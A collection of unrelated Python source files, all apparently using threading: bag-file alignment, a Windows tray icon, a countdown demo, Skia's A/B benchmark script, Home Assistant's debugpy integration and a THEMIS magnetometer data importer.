elif os.path.isfile("../bag-files/images/" + str(int(name[0:-4]) - int(sorted(diferenca_images)[0])) + ".jpeg"):
shutil.copyfile("../bag-files/images/" + str(int(name[0:-4]) - int(sorted(diferenca_images)[0])) + ".jpeg", "../bag-files/database_images/" + name[0:-4] + ".jpeg")
diferenca_cmdvel = []
#cmdvel = [arq for arq in os.listdir("../bag-files/cmd_vel")]
for comando in sorted(cmdvel):
diferenca_cmdvel.append(
abs(int(comando[0:-4]) - int(name[0:-4])))
if (int(comando[0:-4]) - int(name[0:-4])) > 0:
break
if os.path.isfile("../bag-files/cmd_vel/" + name[0:-4] + ".txt"):
shutil.copyfile("../bag-files/cmd_vel/" + name[0:-4] + ".txt", "../bag-files/database_cmdvel/" + name[0:-4] + ".txt")
elif os.path.isfile("../bag-files/cmd_vel/" + str(int(name[0:-4]) + int(sorted(diferenca_cmdvel)[0])) + ".txt"):
shutil.copyfile("../bag-files/cmd_vel/" + str(int(name[0:-4]) + int(sorted(diferenca_cmdvel)[0])) + ".txt", "../bag-files/database_cmdvel/" + name[0:-4] + ".txt")
elif os.path.isfile("../bag-files/cmd_vel/" + str(int(name[0:-4]) - int(sorted(diferenca_cmdvel)[0])) + ".txt"):
shutil.copyfile("../bag-files/cmd_vel/" + str(int(name[0:-4]) - int(sorted(diferenca_cmdvel)[0])) + ".txt", "../bag-files/database_cmdvel/" + name[0:-4] + ".txt")
shutil.copyfile("../bag-files/joy/" + name[0:-4] + ".txt", "../bag-files/database_joy/" + name[0:-4] + ".txt")
def alinha(self):
if os.path.isdir("../bag-files/joy"):
arquivos = [arq for arq in os.listdir("../bag-files/joy")]
images = [arq for arq in os.listdir("../bag-files/images")]
cmdvel = [arq for arq in os.listdir("../bag-files/cmd_vel")]
for name in sorted(arquivos):
#self.alinha_arquivos(name)
p = threading.Thread(target=self.alinha_arquivos, args=(name, images, cmdvel))  # pass args separately so the work actually runs in the thread
p.start()
#time.sleep(0.1)
p.join()
else:
print("Pasta nao encontrada")
exit()
if __name__ == '__main__':
mydata = align()
mydata.alinha()
|
traybar.py
|
import os
from .win32_adapter import *
import threading
import uuid
class SysTrayIcon(object):
QUIT = 'QUIT'
SPECIAL_ACTIONS = [QUIT]
FIRST_ID = 1023
def __init__(self,
icon,
hover_text,
menu_options=None,
on_quit=None,
default_menu_index=None,
window_class_name=None,
left_click=None,
right_click=None):
self._icon = icon
self._hover_text = hover_text
self._on_quit = on_quit
if left_click:
self._left_click = left_click
if right_click:
self._right_click = right_click
self._set_menu_options(menu_options)
window_class_name = window_class_name or ("SysTrayIconPy-%s" % (str(uuid.uuid4())))
self._default_menu_index = (default_menu_index or 0)
self._window_class_name = convert_to_ascii(window_class_name)
self._message_dict = {RegisterWindowMessage("TaskbarCreated"): self._restart,
WM_DESTROY: self._destroy,
WM_CLOSE: self._destroy,
WM_COMMAND: self._command,
WM_USER+20: self._notify}
self._notify_id = None
self._message_loop_thread = None
self._hwnd = None
self._hicon = 0
self._hinst = None
self._window_class = None
self._menu = None
self._register_class()
def _set_menu_options(self, menu_options):
self._menu_actions_by_id = set()
menu_options = menu_options or ()
self._menu_options = self._add_ids_to_menu_options(list(menu_options))
self._menu_actions_by_id = dict(self._menu_actions_by_id)
def _add_ids_to_menu_options(self, menu_options):
self._next_action_id = SysTrayIcon.FIRST_ID
result = []
for menu_option in menu_options:
option_text, option_icon, option_action, fState = menu_option
if callable(option_action) or option_action in SysTrayIcon.SPECIAL_ACTIONS:
self._menu_actions_by_id.add((self._next_action_id, option_action))
result.append(menu_option + (self._next_action_id,))
elif non_string_iterable(option_action):
result.append((option_text,
option_icon,
self._add_ids_to_menu_options(option_action),
self._next_action_id))
else:
raise Exception('Unknown item', option_text, option_icon, option_action)
self._next_action_id += 1
return result
def WndProc(self, hwnd, msg, wparam, lparam):
hwnd = HANDLE(hwnd)
wparam = WPARAM(wparam)
lparam = LPARAM(lparam)
#print msg
if msg in self._message_dict:
self._message_dict[msg](hwnd, msg, wparam.value, lparam.value)
return DefWindowProc(hwnd, msg, wparam, lparam)
def _register_class(self):
# Register the Window class.
self._window_class = WNDCLASS()
self._hinst = self._window_class.hInstance = GetModuleHandle(None)
self._window_class.lpszClassName = self._window_class_name
self._window_class.style = CS_VREDRAW | CS_HREDRAW
self._window_class.hCursor = LoadCursor(0, IDC_ARROW)
self._window_class.hbrBackground = COLOR_WINDOW
self._window_class.lpfnWndProc = LPFN_WNDPROC(self.WndProc)
RegisterClass(ctypes.byref(self._window_class))
def _create_window(self):
style = WS_OVERLAPPED | WS_SYSMENU
self._hwnd = CreateWindowEx(0, self._window_class_name,
self._window_class_name,
style,
0,
0,
CW_USEDEFAULT,
CW_USEDEFAULT,
0,
0,
self._hinst,
None)
UpdateWindow(self._hwnd)
self._refresh_icon(recreate=True)
def _message_loop_func(self):
self._create_window()
PumpMessages()
def start(self):
if self._hwnd:
return # already started
self._message_loop_thread = threading.Thread(target=self._message_loop_func)
self._message_loop_thread.daemon = True
self._message_loop_thread.start()
def shutdown(self):
if not self._hwnd:
return # not started
PostMessage(self._hwnd, WM_CLOSE, 0, 0)
self._message_loop_thread.join()
def update(self, icon=None, hover_text=None, menu=None):
""" update icon image and/or hover text """
if icon:
self._icon = icon
if hover_text:
self._hover_text = hover_text
if menu:
self._set_menu_options(menu)
self._menu = CreatePopupMenu()
self._create_menu(self._menu, self._menu_options)
self._refresh_icon()
def _load_icon(self):
# release previous icon, if a custom one was loaded
# note: it's important *not* to release the icon if we loaded the default system icon (with
# the LoadIcon function) - this is why we assign self._hicon only if it was loaded using LoadImage
# TODO don't reload if not necessary
if self._hicon != 0:
DestroyIcon(self._hicon)
self._hicon = 0
hicon = 0
# Try and find a custom icon
if self._icon is not None and os.path.isfile(self._icon):
icon_flags = LR_LOADFROMFILE | LR_DEFAULTSIZE
icon = convert_to_ascii(self._icon)
hicon = self._hicon = LoadImage(0, icon, IMAGE_ICON, 0, 0, icon_flags)
if hicon == 0:
# Can't find icon file - using default
hicon = LoadIcon(0, IDI_APPLICATION)
return hicon
def _refresh_icon(self, recreate=False):
if self._hwnd is None:
return
hicon = self._load_icon()
if self._notify_id and not recreate:
message = NIM_MODIFY
else:
message = NIM_ADD
self._notify_id = NotifyData(self._hwnd,
0,
NIF_ICON | NIF_MESSAGE | NIF_TIP,
WM_USER+20,
hicon,
self._hover_text)
Shell_NotifyIcon(message, ctypes.byref(self._notify_id))
def _restart(self, hwnd, msg, wparam, lparam):
self._refresh_icon(recreate=True)
def _destroy(self, hwnd, msg, wparam, lparam):
if self._on_quit:
self._on_quit(self)
nid = NotifyData(self._hwnd, 0)
Shell_NotifyIcon(NIM_DELETE, ctypes.byref(nid))
PostQuitMessage(0) # Terminate the app.
# TODO * release self._menu with DestroyMenu and reset the member
#      * release self._hicon with DestroyIcon and reset the member
# * release loaded menu icons (loaded in _load_menu_icon) with DeleteObject
# (we don't keep those objects anywhere now)
self._hwnd = None
self._notify_id = None
def _notify(self, hwnd, msg, wparam, lparam):
#print lparam
if lparam == WM_LBUTTONDBLCLK:
self._execute_menu_option(self._default_menu_index + SysTrayIcon.FIRST_ID)
elif lparam == WM_RBUTTONUP:
self._right_click()
elif lparam == WM_LBUTTONUP:
self._left_click()
return True
def _left_click(self):
pass
def _right_click(self):
self._show_menu()
def _show_menu(self):
if self._menu is None:
self._menu = CreatePopupMenu()
self._create_menu(self._menu, self._menu_options)
#SetMenuDefaultItem(self._menu, 1000, 0)
pos = POINT()
GetCursorPos(ctypes.byref(pos))
# See http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/menus_0hdi.asp
SetForegroundWindow(self._hwnd)
TrackPopupMenu(self._menu,
TPM_LEFTALIGN,
pos.x,
pos.y,
0,
self._hwnd,
None)
PostMessage(self._hwnd, WM_NULL, 0, 0)
def _create_menu(self, menu, menu_options):
for option_text, option_icon, option_action, fState, option_id in menu_options[::-1]:
if option_icon:
option_icon = self._load_menu_icon(option_icon)
if option_id in self._menu_actions_by_id:
item = PackMENUITEMINFO(text=option_text,
hbmpItem=option_icon,
wID=option_id,
fState=fState)
else:
submenu = CreatePopupMenu()
self._create_menu(submenu, option_action)
item = PackMENUITEMINFO(text=option_text,
hbmpItem=option_icon,
hSubMenu=submenu)
InsertMenuItem(menu, 0, 1, ctypes.byref(item))
def _load_menu_icon(self, icon):
icon = convert_to_ascii(icon)
# First load the icon.
ico_x = GetSystemMetrics(SM_CXSMICON)
ico_y = GetSystemMetrics(SM_CYSMICON)
hicon = LoadImage(0, icon, IMAGE_ICON, ico_x, ico_y, LR_LOADFROMFILE)
hdcBitmap = CreateCompatibleDC(None)
hdcScreen = GetDC(None)
hbm = CreateCompatibleBitmap(hdcScreen, ico_x, ico_y)
hbmOld = SelectObject(hdcBitmap, hbm)
# Fill the background.
brush = GetSysColorBrush(COLOR_MENU)
FillRect(hdcBitmap, ctypes.byref(RECT(0, 0, 16, 16)), brush)
# draw the icon
DrawIconEx(hdcBitmap, 0, 0, hicon, ico_x, ico_y, 0, 0, DI_NORMAL)
SelectObject(hdcBitmap, hbmOld)
# No need to free the brush
DeleteDC(hdcBitmap)
DestroyIcon(hicon)
return hbm
def _command(self, hwnd, msg, wparam, lparam):
id = LOWORD(wparam)
self._execute_menu_option(id)
def _execute_menu_option(self, id):
menu_action = self._menu_actions_by_id[id]
if menu_action == SysTrayIcon.QUIT:
DestroyWindow(self._hwnd)
else:
menu_action(self)
def non_string_iterable(obj):
try:
iter(obj)
except TypeError:
return False
else:
return not isinstance(obj, str)
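# Minimal usage sketch (illustrative only; the icon path, texts and callback below are
# hypothetical examples, and each menu option is a (text, icon, action, fState) tuple):
#
#   def say_hello(tray):
#       print("hello from the tray menu")
#
#   tray = SysTrayIcon("app.ico", "Demo icon",
#                      menu_options=(("Say hello", None, say_hello, 0),))
#   tray.start()
#   ...                 # keep the main thread alive while the icon is shown
#   tray.shutdown()     # removes the icon and stops the message loop thread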
|
mt.py
|
#!/usr/bin/python3
import time
from datetime import datetime, timedelta
from threading import Thread
class Multi:
def __init__(self):
self.stop = False
def countdown(self, n):
self.start = datetime.now()
while not self.stop and n > 0:
delta = datetime.now()-self.start
if delta > timedelta(seconds=5):
print(datetime.now())
self.start = datetime.now()
print('T-', n)
n -= 1
time.sleep(2)
if n == 0:
print("Finished")
else:
print("Stopped")
class Infinite:
def __init__(self):
pass
def countdown(n):
while n > 0:
print('T-', n)
n -= 1
time.sleep(2)
def single():
try:
countdown(10)
except KeyboardInterrupt:
print('Stopping')
def multi():
print('Press enter to stop')
m = Multi()
t = Thread(target=m.countdown, args=(10,) )
t.start()
input()
m.stop = True
multi()
|
ab.py
|
#!/usr/bin/python
# encoding: utf-8
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be found
# in the LICENSE file.
#
# This is an A/B test utility script used by calmbench.py
#
# For each bench, we get a distribution of min_ms measurements from nanobench.
# From that, we try to recover the 1/3 and 2/3 quantiles of the distribution.
# If range (1/3 quantile, 2/3 quantile) is completely disjoint between A and B,
# we report that as a regression.
#
# The more measurements we have for a bench, the more accurate our quantiles
# are. However, taking more measurements is time consuming. Hence we'll prune
# out benches and only take more measurements for benches whose current quantile
# ranges are disjoint.
#
# P.S. The current script was translated line-by-line (by brute force) from a Ruby
# script, so it may be ugly...
import re
import os
import sys
import time
import json
import subprocess
import shlex
import multiprocessing
import traceback
from argparse import ArgumentParser
from multiprocessing import Process
from threading import Thread
from threading import Lock
from pdb import set_trace
HELP = """
\033[31mPlease call calmbench.py to drive this script if you're not doing so.
This script is not supposed to be used by itself. (At least, it's not easy to
use by itself. The calmbench bots may use this script directly.)
\033[0m
"""
FACTOR = 3 # lower/upper quantile factor
DIFF_T = 0.99 # different enough threshold
TERM = 10 # terminate after this no. of iterations without suspect changes
MAXTRY = 30 # max number of nanobench tries to narrow down suspects
UNITS = "ns µs ms s".split()
timesLock = Lock()
timesA = {}
timesB = {}
def parse_args():
parser = ArgumentParser(description=HELP)
parser.add_argument('outdir', type=str, help="output directory")
parser.add_argument('a', type=str, help="name of A")
parser.add_argument('b', type=str, help="name of B")
parser.add_argument('nano_a', type=str, help="path to A's nanobench binary")
parser.add_argument('nano_b', type=str, help="path to B's nanobench binary")
parser.add_argument('arg_a', type=str, help="args for A's nanobench run")
parser.add_argument('arg_b', type=str, help="args for B's nanobench run")
parser.add_argument('repeat', type=int, help="number of initial runs")
parser.add_argument('skip_b', type=str, help=("whether to skip running B"
" ('true' or 'false')"))
parser.add_argument('config', type=str, help="nanobench config")
parser.add_argument('threads', type=int, help="number of threads to run")
parser.add_argument('noinit', type=str, help=("whether to skip the initial runs"
" ('true' or 'false')"))
parser.add_argument('--concise', dest='concise', action="store_true",
help="If set, no verbose thread info will be printed.")
parser.set_defaults(concise=False)
# Additional args for bots
BHELP = "bot specific options"
parser.add_argument('--githash', type=str, default="", help=BHELP)
parser.add_argument('--keys', type=str, default=[], nargs='+', help=BHELP)
args = parser.parse_args()
args.skip_b = args.skip_b == "true"
args.noinit = args.noinit == "true"
if args.threads == -1:
args.threads = 1
if args.config in ["8888", "565"]: # multi-thread for CPU only
args.threads = max(1, multiprocessing.cpu_count() / 2)
return args
def append_dict_sorted_array(dict_array, key, value):
if key not in dict_array:
dict_array[key] = []
dict_array[key].append(value)
dict_array[key].sort()
def add_time(args, name, bench, t, unit):
normalized_t = t * 1000 ** UNITS.index(unit);
if name.startswith(args.a):
append_dict_sorted_array(timesA, bench, normalized_t)
else:
append_dict_sorted_array(timesB, bench, normalized_t)
def append_times_from_file(args, name, filename):
with open(filename) as f:
lines = f.readlines()
for line in lines:
items = line.split()
if len(items) > 10:
bench = items[10]
matches = re.search("([+-]?\d*.?\d+)(s|ms|µs|ns)", items[3])
if (not matches or items[9] != args.config):
continue
time_num = matches.group(1)
time_unit = matches.group(2)
add_time(args, name, bench, float(time_num), time_unit)
class ThreadWithException(Thread):
def __init__(self, target):
super(ThreadWithException, self).__init__(target = target)
self.exception = None
def run(self):
try:
self._Thread__target(*self._Thread__args, **self._Thread__kwargs)
except BaseException as e:
self.exception = e
def join(self, timeout=None):
super(ThreadWithException, self).join(timeout)
class ThreadRunner:
"""Simplest and stupidiest threaded executer."""
def __init__(self, args):
self.concise = args.concise
self.threads = []
def add(self, args, fn):
if len(self.threads) >= args.threads:
self.wait()
t = ThreadWithException(target = fn)
t.daemon = True
self.threads.append(t)
t.start()
def wait(self):
def spin():
i = 0
spinners = [". ", ".. ", "..."]
while len(self.threads) > 0:
timesLock.acquire()
sys.stderr.write(
"\r" + spinners[i % len(spinners)] +
" (%d threads running)" % len(self.threads) +
" \r" # spaces for erasing characters
)
timesLock.release()
time.sleep(0.5)
i += 1
if not self.concise:
ts = Thread(target = spin);
ts.start()
for t in self.threads:
t.join()
exceptions = []
for t in self.threads:
if t.exception:
exceptions.append(t.exception)
self.threads = []
if not self.concise:
ts.join()
if len(exceptions):
for exc in exceptions:
print exc
raise exceptions[0]
def split_arg(arg):
raw = shlex.split(arg)
result = []
for r in raw:
if '~' in r:
result.append(os.path.expanduser(r))
else:
result.append(r)
return result
def run(args, threadRunner, name, nano, arg, i):
def task():
file_i = "%s/%s.out%d" % (args.outdir, name, i)
should_run = not args.noinit and not (name == args.b and args.skip_b)
if i <= 0:
should_run = True # always run for suspects
if should_run:
if i > 0:
timesLock.acquire()
print "Init run %d for %s..." % (i, name)
timesLock.release()
subprocess.check_call(["touch", file_i])
with open(file_i, 'w') as f:
subprocess.check_call([nano] + split_arg(arg) +
["--config", args.config], stderr=f, stdout=f)
timesLock.acquire()
append_times_from_file(args, name, file_i)
timesLock.release()
threadRunner.add(args, task)
def init_run(args):
threadRunner = ThreadRunner(args)
for i in range(1, max(args.repeat, args.threads / 2) + 1):
run(args, threadRunner, args.a, args.nano_a, args.arg_a, i)
run(args, threadRunner, args.b, args.nano_b, args.arg_b, i)
threadRunner.wait()
def get_lower_upper(values):
i = max(0, (len(values) - 1) / FACTOR)
return values[i], values[-i - 1]
def different_enough(lower1, upper2):
return upper2 < DIFF_T * lower1
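# Worked example (numbers are illustrative): with FACTOR = 3 and 9 sorted measurements,
# get_lower_upper picks index (9 - 1) / 3 = 2, i.e. the 3rd smallest and 3rd largest
# values, approximating the 1/3 and 2/3 quantiles. A bench is then suspected only when
# one side's upper quantile falls below DIFF_T (99%) of the other side's lower quantile,
# i.e. the two quantile ranges are essentially disjoint.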
# TODO(liyuqian): we used this hacky criteria mainly because that I didn't have
# time to study more rigorous statistical tests. We should adopt a more rigorous
# test in the future.
def get_suspects():
suspects = []
for bench in timesA.keys():
if bench not in timesB:
continue
lowerA, upperA = get_lower_upper(timesA[bench])
lowerB, upperB = get_lower_upper(timesB[bench])
if different_enough(lowerA, upperB) or different_enough(lowerB, upperA):
suspects.append(bench)
return suspects
def process_bench_pattern(s):
if ".skp" in s: # skp bench won't match their exact names...
return "^\"" + s[0:(s.index(".skp") + 3)] + "\""
else:
return "^\"" + s + "\"$"
def suspects_arg(suspects):
patterns = map(process_bench_pattern, suspects)
return " --match " + (" ".join(patterns))
def median(array):
return array[len(array) / 2]
def regression(bench):
a = median(timesA[bench])
b = median(timesB[bench])
if (a == 0): # bad bench, just return no regression
return 1
return b / a
def percentage(x):
return (x - 1) * 100
def format_r(r):
return ('%6.2f' % percentage(r)) + "%"
def normalize_r(r):
if r > 1.0:
return r - 1.0
else:
return 1.0 - 1/r
def test():
args = parse_args()
init_run(args)
last_unchanged_iter = 0
last_suspect_number = -1
tryCnt = 0
it = 0
while tryCnt < MAXTRY:
it += 1
suspects = get_suspects()
if len(suspects) != last_suspect_number:
last_suspect_number = len(suspects)
last_unchanged_iter = it
if (len(suspects) == 0 or it - last_unchanged_iter >= TERM):
break
print "Number of suspects at iteration %d: %d" % (it, len(suspects))
threadRunner = ThreadRunner(args)
for j in range(1, max(1, args.threads / 2) + 1):
run(args, threadRunner, args.a, args.nano_a,
args.arg_a + suspects_arg(suspects), -j)
run(args, threadRunner, args.b, args.nano_b,
args.arg_b + suspects_arg(suspects), -j)
tryCnt += 1
threadRunner.wait()
suspects = get_suspects()
if len(suspects) == 0:
print ("%s and %s does not seem to have significant " + \
"performance differences.") % (args.a, args.b)
else:
suspects.sort(key = regression)
print "%s (compared to %s) is likely" % (args.a, args.b)
for suspect in suspects:
r = regression(suspect)
if r < 1:
print "\033[31m %s slower in %s\033[0m" % \
(format_r(1/r), suspect)
else:
print "\033[32m %s faster in %s\033[0m" % \
(format_r(r), suspect)
with open("%s/bench_%s_%s.json" % (args.outdir, args.a, args.b), 'w') as f:
results = {}
for bench in timesA:
r = regression(bench) if bench in suspects else 1.0
results[bench] = {
args.config: {
"signed_regression": normalize_r(r),
"lower_quantile_ms": get_lower_upper(timesA[bench])[0] * 1e-6,
"upper_quantile_ms": get_lower_upper(timesA[bench])[1] * 1e-6,
"options": {
# TODO(liyuqian): let ab.py call nanobench with --outResultsFile so
# nanobench could generate the json for us that's exactly the same
# as that being used by perf bots. Currently, we cannot guarantee
# that bench is the name (e.g., bench may have additional resolution
# information appended after name).
"name": bench
}
}
}
output = {"results": results}
if args.githash:
output["gitHash"] = args.githash
if args.keys:
keys = {}
for i in range(len(args.keys) / 2):
keys[args.keys[i * 2]] = args.keys[i * 2 + 1]
output["key"] = keys
f.write(json.dumps(output, indent=4))
print ("\033[36mJSON results available in %s\033[0m" % f.name)
with open("%s/bench_%s_%s.csv" % (args.outdir, args.a, args.b), 'w') as out:
out.write(("bench, significant?, raw regresion, " +
"%(A)s quantile (ns), %(B)s quantile (ns), " +
"%(A)s (ns), %(B)s (ns)\n") % {'A': args.a, 'B': args.b})
for bench in suspects + timesA.keys():
if (bench not in timesA or bench not in timesB):
continue
ta = timesA[bench]
tb = timesB[bench]
out.write(
"%s, %s, %f, " % (bench, bench in suspects, regression(bench)) +
' '.join(map(str, get_lower_upper(ta))) + ", " +
' '.join(map(str, get_lower_upper(tb))) + ", " +
("%s, %s\n" % (' '.join(map(str, ta)), ' '.join(map(str, tb))))
)
print (("\033[36m" +
"Compared %d benches. " +
"%d of them seem to be significantly differrent." +
"\033[0m") %
(len([x for x in timesA if x in timesB]), len(suspects)))
print ("\033[36mPlease see detailed bench results in %s\033[0m" %
out.name)
if __name__ == "__main__":
try:
test()
except Exception as e:
print e
print HELP
traceback.print_exc()
raise e
|
__init__.py
|
"""The Remote Python Debugger integration."""
from asyncio import Event
import logging
from threading import Thread
from typing import Optional
import debugpy
import voluptuous as vol
from homeassistant.const import CONF_HOST, CONF_PORT
from homeassistant.core import HomeAssistant, ServiceCall
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.service import async_register_admin_service
from homeassistant.helpers.typing import ConfigType
DOMAIN = "debugpy"
CONF_WAIT = "wait"
CONF_START = "start"
SERVICE_START = "start"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Optional(CONF_HOST, default="0.0.0.0"): cv.string,
vol.Optional(CONF_PORT, default=5678): cv.port,
vol.Optional(CONF_START, default=True): cv.boolean,
vol.Optional(CONF_WAIT, default=False): cv.boolean,
}
)
},
extra=vol.ALLOW_EXTRA,
)
_LOGGER = logging.getLogger(__name__)
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up the Remote Python Debugger component."""
conf = config[DOMAIN]
async def debug_start(
call: Optional[ServiceCall] = None, *, wait: bool = True
) -> None:
"""Start the debugger."""
debugpy.listen((conf[CONF_HOST], conf[CONF_PORT]))
wait = conf[CONF_WAIT]
if wait:
_LOGGER.warning(
"Waiting for remote debug connection on %s:%s",
conf[CONF_HOST],
conf[CONF_PORT],
)
ready = Event()
def waitfor():
debugpy.wait_for_client()
hass.loop.call_soon_threadsafe(ready.set)
Thread(target=waitfor).start()
await ready.wait()
else:
_LOGGER.warning(
"Listening for remote debug connection on %s:%s",
conf[CONF_HOST],
conf[CONF_PORT],
)
async_register_admin_service(
hass, DOMAIN, SERVICE_START, debug_start, schema=vol.Schema({})
)
# If set to start the debugger on startup, do so
if conf[CONF_START]:
await debug_start(wait=conf[CONF_WAIT])
return True
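# Example configuration.yaml entry (illustrative; the values shown are the schema
# defaults declared above):
#
#   debugpy:
#     host: 0.0.0.0
#     port: 5678
#     start: true
#     wait: false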
|
MagnetometerData.py
|
from .TimeSeries import TimeSeries, generateTimeSeries
from .DataSet import DataSet, DataSet_3D
from .DataSet_1D import DataSet_1D
from threading import Thread
import numpy as np
from numpy import logical_or, logical_and
from ai import cdas
class MagnetometerData():
"""Class providing a high level api for data import and processing"""
def __init__(self):
self.magneticField: DataSet_3D = None
"""The magnetic field at the satellite"""
self.position: DataSet_3D = None
"""The position of the satellite"""
self.meanField: DataSet_3D = None
"""The mean magnetic field after a rolling average"""
self.magneticFieldMeanFieldCoordinates: DataSet_3D = None
"""The magnetic field in mean field align coordinates"""
self.peemIdentifyMagnetosheath: DataSet = None
"""Required information for removal of magnetosheath
``keys: 'density','velocity_x','flux_x',flux_y'`` """
def _importAsync(self,funcs,startDatetime,endDatetime,*args) -> None:
""" Runs the CDAS imports defined in ``funcs`` asyncronously.
eg.
::
# User defines each of these methods for data from a particular satellite
funcs = (self._importCdasMagneticField,self._importCdasPosition,self._importCdasPeem)
self._importAsync(funcs,startDatetime,endDatetime,*args)
:param funcs:
Tuple of functions to execute. Each function should be of the form
``func(startDatetime,endDatetime,*args) -> None``. Any imported data
should be written to a class attribute.
.. Warning::
These functions should not read data from the class or modify the same attributes
as there is no protection against race conditions. The functions are run simultaneously
using the ``threading`` library.
:param startDatetime:
Start of data range as ``datetime.datetime`` or ``numpy.datetime64``
:param endDatetime:
End of data range as ``datetime.datetime`` or ``numpy.datetime64``
:param \*args:
Arbitrary arguments to be passed to the functions.
"""
arguments = (startDatetime,endDatetime,*args)
fetchers = []
for func in funcs:
fetch = Thread(target=func,args=arguments)
fetch.start()
fetchers.append(fetch)
for fetch in fetchers:
fetch.join()
def fillLessThanRadius(self,radiusInEarthRadii,const=0) -> None:
"""Fills all values in the magnetic field with ``const`` when the radius is below the
specified value.
"""
assert(self.position.timeSeries == self.magneticField.timeSeries)
radiusMask = self.position.data["radius"] < radiusInEarthRadii
self.magneticField.fillFlagged(radiusMask,const)
def convertToMeanFieldCoordinates(self) -> None:
""" Converts the magnetic field data in :attr:`magneticField` to mean field coordinates,
saving the output in :attr:`magneticFieldMeanFieldCoordinates`.
.. warning::
:attr:`meanField` must be specified and contain a 3D dataset with the mean
magnetic field.
:attr:`magneticField` must be specified
"""
assert(self.position.timeSeries == self.magneticField.timeSeries)
assert(self.magneticField.timeSeries == self.meanField.timeSeries)
fieldUnitVector = self.meanField.copy()
fieldUnitVector.makeUnitVector()
earthUnitVector = -(self.position.copy())
earthUnitVector.makeUnitVector()
polUnitVector = fieldUnitVector.cross(earthUnitVector)
polUnitVector.makeUnitVector()
torUnitVector = fieldUnitVector.cross(polUnitVector)
torUnitVector.makeUnitVector()
self.magneticFieldMeanFieldCoordinates = self.magneticField.coordinateTransform(
fieldUnitVector,
polUnitVector,
torUnitVector
)
def removeMagnetosheath(self) -> None:
"""Removes portions of magnetic field data while the satellite is in the magnetosheath.
:attr:`peemIdentifyMagnetosheath` must be specified, otherwise no action is taken.
"""
if self.peemIdentifyMagnetosheath is None:
return None
fluxX = self.peemIdentifyMagnetosheath.data['flux_x']
fluxY = self.peemIdentifyMagnetosheath.data['flux_y']
perpFlux = (fluxX**2 + fluxY**2)**(1/2)
density = self.peemIdentifyMagnetosheath.data['density']
velocityX = self.peemIdentifyMagnetosheath.data['velocity_x']
removeSheathFlags = logical_and(
(self.position.data["radius"] > 8),
logical_or(
(density > 10),
logical_or(
(velocityX < -200),
(perpFlux > 2e7)
)
)
)
self.magneticField.fillFlagged(removeSheathFlags)
def _interpolateReference(self, refTimeSeries: TimeSeries) -> None:
"""Removes duplicate times, then interpolates data sets :attr:`magneticField`,
:attr:`position` and :attr:`peemIdentifyMagnetosheath` to match the specified time series,
if the data sets are not None."""
for x in (
self.magneticField,
self.position,
self.peemIdentifyMagnetosheath,
):
if x is not None:
x.removeDuplicateTimes()
x.interpolateReference(refTimeSeries)
def _importCdasItemWithExceptions(self,
cdasArgs: tuple,
timeSeriesKey: str,
targetKeys: dict,
returnClassType: type = DataSet,
):
"""Imports cdas data for the given ``cdasArgs``, extracting a dataset.
:param tuple cdasArgs:
Arguments for data to get, as specified for ``ai.cdas.get_data()``.
(str dataview, str dataset, datetime startTime, datetime stopTime, list str variables)
:param str timeSeriesKey: The key under which the times are stored in the CDAS data return
:param dict targetKeys:
Dictionary whose values are the keys in the CDAS data to include in the data set, and
whose keys are the keys that should be used to reference these within the data set.
:param type returnClassType:
Class used to construct the returned data set, eg. :class:`DataSet`, :class:`DataSet_3D`
"""
try:
data = cdas.get_data(*cdasArgs,progress=False)
except ValueError:
raise CdasImportError.CdasUnspecifedMissingDataError
if data is None:
raise CdasImportError.CdasNoDataReturnedError
timeSeries = TimeSeries(data[timeSeriesKey])
selectedData = {}
for key, cdasKey in targetKeys.items():
try:
d = data[cdasKey]
except KeyError:
raise CdasImportError.CdasKeyMissingError(f"Key not found: {cdasKey}")
selectedData[key] = d
return returnClassType(timeSeries, selectedData)
class THEMISdata(MagnetometerData):
def interpolate(self,spacingInSeconds=3) -> None:
"""Interpolates data sets :attr:`magneticField`, :attr:`position` and
:attr:`peemIdentifyMagnetosheath` to the specified spacing, if they are not None.
A default spacing of 3s is chosen for THEMIS data. This is slightly smaller than the mean
sample spacing in the raw magnetometer data of ~3.17 s. Using a consistent value aids in
establishing the correspondence between frequencies in sonified audio and the raw data.
"""
refTimeSeries = generateTimeSeries(
self.magneticField.timeSeries.getStart(),
self.magneticField.timeSeries.getEnd(),
spacing=np.timedelta64(spacingInSeconds,'s')
)
self._interpolateReference(refTimeSeries)
def importCDAS(self,startDatetime,endDatetime,satellite="D") -> None:
""" Imports magnetic field, position, radial distance and peem data for the designated
THEMIS satellite and datetime range.
The possible satellite letters are: "A", "B", "C", "D" or "E".
See also: :meth:`MagnetometerData._importAsync`
"""
funcs = (self._importCdasMagneticField,self._importCdasPosition,self._importCdasPeem)
self._importAsync(funcs,startDatetime,endDatetime,satellite)
def _importCdasPosition(self, startDatetime, endDatetime, satellite) -> None:
cdasArgs = (
'sp_phys',
f'TH{satellite.upper()}_OR_SSC',
startDatetime,
endDatetime,
['XYZ_GSM','RADIUS'],
)
timeSeriesKey = "EPOCH"
targetKeys = {
0: 'X', 1: 'Y', 2: 'Z', 'radius': "RADIUS"
}
self.position = self._importCdasItemWithExceptions(
cdasArgs,timeSeriesKey,targetKeys,DataSet_3D
)
def _importCdasMagneticField(self, startDatetime, endDatetime, satellite) -> None:
cdasArgs = (
'sp_phys',
f'TH{satellite.upper()}_L2_FGM',
startDatetime,
endDatetime,
[f'th{satellite.lower()}_fgs_gsmQ']
)
timeSeriesKey = "UT"
targetKeys = {
0: f"BX_FGS-{satellite.upper()}",
1: f"BY_FGS-{satellite.upper()}",
2: f"BZ_FGS-{satellite.upper()}"
}
self.magneticField = self._importCdasItemWithExceptions(
cdasArgs,timeSeriesKey,targetKeys,DataSet_3D
)
def _importCdasPeem(self,startDatetime,endDatetime,satellite) -> None:
cdasArgs = (
'sp_phys',
f'TH{satellite.upper()}_L2_MOM',
startDatetime,
endDatetime,
[
f'th{satellite.lower()}_peem_density',
f'th{satellite.lower()}_peem_velocity_gsm',
f'th{satellite.lower()}_peem_flux'
]
)
timeSeriesKey = "UT"
targetKeys = {
'density': f"N_ELEC_MOM_ESA-{satellite.upper()}",
'velocity_x': f'VX_ELEC_GSM_MOM_ESA-{satellite.upper()}',
'flux_x': f'FX_ELEC_MOM_ESA-{satellite.upper()}',
